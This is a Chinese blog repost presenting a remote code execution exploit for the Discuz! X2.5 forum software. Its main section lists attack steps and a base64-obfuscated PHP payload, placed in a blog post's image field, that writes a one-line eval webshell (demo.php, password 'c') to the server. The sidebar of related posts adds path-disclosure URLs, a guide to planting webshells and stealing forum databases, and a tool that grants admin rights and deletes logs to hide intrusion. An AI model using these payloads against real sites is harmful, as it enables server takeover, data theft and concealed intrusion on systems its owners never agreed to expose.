Discuz! X2.5 远程代码执行漏洞及EXP

最新推荐文章于 2024-06-22 16:25:24 发布
最新推荐文章于 2024-06-22 16:25:24 发布
阅读量315 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/mujj/articles/2620907.html
版权

利用方法:

1.注册任意账户

2.登陆用户,发表blog日志(注意是日志)

3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

4.访问日志,论坛根目录下生成demo.php,一句发密码C

转载于:https://www.cnblogs.com/mujj/articles/2620907.html

weixin_30363817
关注
Discuz! x2.5深黑经典模板
12-01
x2.5深黑经典模板" 涉及的主要知识点是Discuz! X2.5论坛系统以及其配套的主题模板设计。Discuz! 是一款非常流行的开源社区建站软件,主要功能是帮助用户快速搭建属于自己的论坛网站。X2.5是Discuz! 的一个特定版本...
愤怒的小鸟 Discuz! X2.5 插件源代码
03-18
X2.5 插件源代码"是一款专为Discuz! X2.5论坛系统设计的扩展程序,旨在为用户提供趣味性的互动体验,以"愤怒的小鸟"这一经典游戏为主题。该插件不仅兼容X1.5、X2版本,还与X2.5版本完美融合,确保在不同版本的...
Discuz! X2.5 远程代码执行漏洞EXP[XDAY]
oceanark的博客
07-13 2683
----------- 首先膜拜大牛的共享精神,我淫比较懒试了几个站都没成功就不弄了,但有人说成功了,不知道是PR问题还是补丁了   正文:前面省略一万+字。。。。 利用方法 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),
DZ(discuz) x2.5 爆路径漏洞
收集盒 Book box
11-20 2655
/* just for search DZ x2.5 爆路径 绝对路径 dzx2.5爆路径 dz2.5爆路径 dz x.25 Dz x.25 DZ 2.5 */ 白肚 & 股沟 没找到dzx2.5的爆路径的漏洞 遂拿自己写的那个白盒测试挖洞辅助工具 果断秒杀之 发出来共享之 爆路径文件如下: /uc_server/control/admin/db.php /source/plug
20分钟攻破DISCUZ论坛并盗取数据库(web安全白帽子)
最新发布
qq_44870829的博客
06-22 1323
1 快速搭建discuz论坛 2 使用kali下burpsuite对discuz后台注入PHP木马 3 使用cknife “菜刀” 上传webshell 木马到网站 4 使用webshell查看mysql数据库密码并盗取数据库
DZ x2.5 爆路径漏洞
fengling132的专栏
08-23 852
测试exp:    http://localhost/uc_server/control/admin/db.php    http://localhost/source/plugin/myrepeats/table/table_myrepeats.php    http://localhost/install/include/install_lang.php
discuz! x2.5 代码执行流程浅析
weixin_30919429的博客
11-28 187
以dz根目录门户请求入口文件 portal.php为例,浅析其执行流程。 我们以portal.php为例,用户请求 http://xxx.xxx.xx/portal.php 接收到用户请求,脚本执行以下内容: //定义当前应用ID define('APPTYPEID', 4); //定义当前应用脚本名称 define('CURSCRIPT', 'portal'); //引入dz核心...
discuzx2.5php7.0,discuz!X2.5新浪微博登陆
weixin_31504783的博客
03-20 177
2012年8月3日更新:因为新浪微博调整了接口,目前所有的discuzX2.5新浪微博连接都不能正常使用,期待官方出X2.5版。因为我的网站南昌大学档案学生社区是用discuz!X2.5搭建,关闭了普通注册,因此开放了QQ登陆和邀请注册,今天又使用了一款新浪微博登陆的插件,用户可以使用新浪微博账号直接登录discuz!X2.5。首先下载该插件,我已经上传到自己的dbank网盘。该插件是一个测试版,...
灯鹭社会化多帐号登录插件 for Discuz!X2.5源代码
03-18
灯鹭社会化多帐号登录插件允许用户可以使用QQ帐号、人人网、腾讯... discuz_x2.5灯鹭1.0.0插件安装流程: 1.把插件的包里的所有文件放到/source/plugin目录下。 2.进入后台,点击导航栏中的插件,选择安装新插件找到
Discuz! X2.5 愤怒的小鸟插件V1.0.rar
07-14
X2.5 愤怒的小鸟插件V1.0》是一款专为Discuz! X2.5论坛系统设计的趣味插件,同时也兼容Discuz! X1.5、X2版本。这款插件的独特之处在于它并未对论坛的系统文件进行任何修改,而是通过外部实现方式,确保了用户在安装...
Discuz! x2.5回首经典模板
12-13
x2.5 回首经典模板】是一款专为社区论坛设计的蓝色主题模板,特别适用于基于Discuz! X2.5版本的网站。这款模板以其经典的外观和蓝色调,为用户营造出舒适、专业的在线交流环境。本文将深入探讨这款模板的特点、优势...
discuz X25 某功能存在 xss漏洞以及解决方案
09-28
discuz X25 某功能存在 xss漏洞 html 脚本未过滤
政政Discuz!NT 2.5.0 漏洞利用工具 1
02-11
软件名:政政Discuz!NT 2.5.0 漏洞利用工具 1.0 程序帮助: 1、先检测该论坛是否存在此漏洞 2、注册一个普通的帐号,提权成为管理员 3、更新ASPX为可上传,主要是为了上传ASPX木马的 4、去发表一个帖子,把你的ASPX木马上传上去。 5、去后台找附件的绝对路径,登陆你的ASPX木马 6、删除前台自己发的帖子,保留附件 7、更新ASPX不可上传,取后门 8、删除自己的相关日志 9、取消自己的管理员身份 10、完毕,成功拿到一台webshell ASPX木马的一般权限都很大,很好提权,拿到一台webshell也意味着你拿了一台服务器哦~!
DiscuzX2注入漏洞及XSS漏洞的利用
harryxlb的专栏
11-17 4986
注射漏洞详细说明: 文件:source\module\forum\forum_attachment.php if(!defined('IN_DISCUZ')) { exit('Access Denied'); } define('NOROBOT', TRUE); @list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'],
Discuz2.5-3.4任意文件删除漏洞分析
老北京砸酱锤的博客
06-22 609
Discuz!X ≤3.4 任意文件删除漏洞 Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。 2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。 修复建议 升级到最新版本的 Discuz! 实验环境 操作机:centos7 目标地址:192.168.0.105 Discuz版本:3.1 实验步骤 步骤1:了解原理 该漏洞于2014年6.
Discuz! x 2.5-3.0 beta 存储型跨站漏洞
weixin_30800807的博客
09-23 98
漏洞版本: Discuz x 2.5 - 3.0 漏洞描述: Discuz! 已拥有11年以上的应用历史和200多万网站用户案例 是全球成熟度最高、覆盖率最大的论坛软件系统之一,淘帖处发表评论,直接插入XSS CODE。可触发XSS漏洞 <* 参考 http://loudong.360.cn/vul/info/id/255 *> 安全建议: 厂...
Discuz! X2 SQL注射漏洞 0day
fengling132的专栏
05-02 1048
@Discuz! X2 SQL注射漏洞 0day  文件:source\module\forum\forum_attachment.php   if(!defined('IN_DISCUZ')) { exit('Access Denied'); } define('NOROBOT', TRUE); @list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
网络安全实战之discuz上传漏洞利用
weixin_44255593的博客
02-16 5984
攻击思路: 想要拿下一台主机A的权限: 1、了解一下这个服务器:端口,服务器版本,操作系统版本。找漏洞 2、拿到对A有一定权限的身仹。如果对方是一个WEB服务器,就利用对方网站应用程序的漏洞,上传webshell然后提权 3、传上去后,得到apache用户普通权限,再提权成root 概述: 这突破在一个DZ X系列自带的转换工具里面。 漏洞路径:utility / convert / data / config.inc.php 漏洞发生的原因是:config.inc.php这个文件在黑客通过post写入时,
Discuz!X2.5 插件开发教程:从入门到精通
通过运行这些代码,你可以实时地了解Discuz!X2.5在运行时的状态。 这个教程是一个很好的起点,适合那些想要增强Discuz!X2.5功能并对其进行自定义的开发者。它涵盖了基础概念和实践技巧,帮助你逐步掌握插件开发的全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值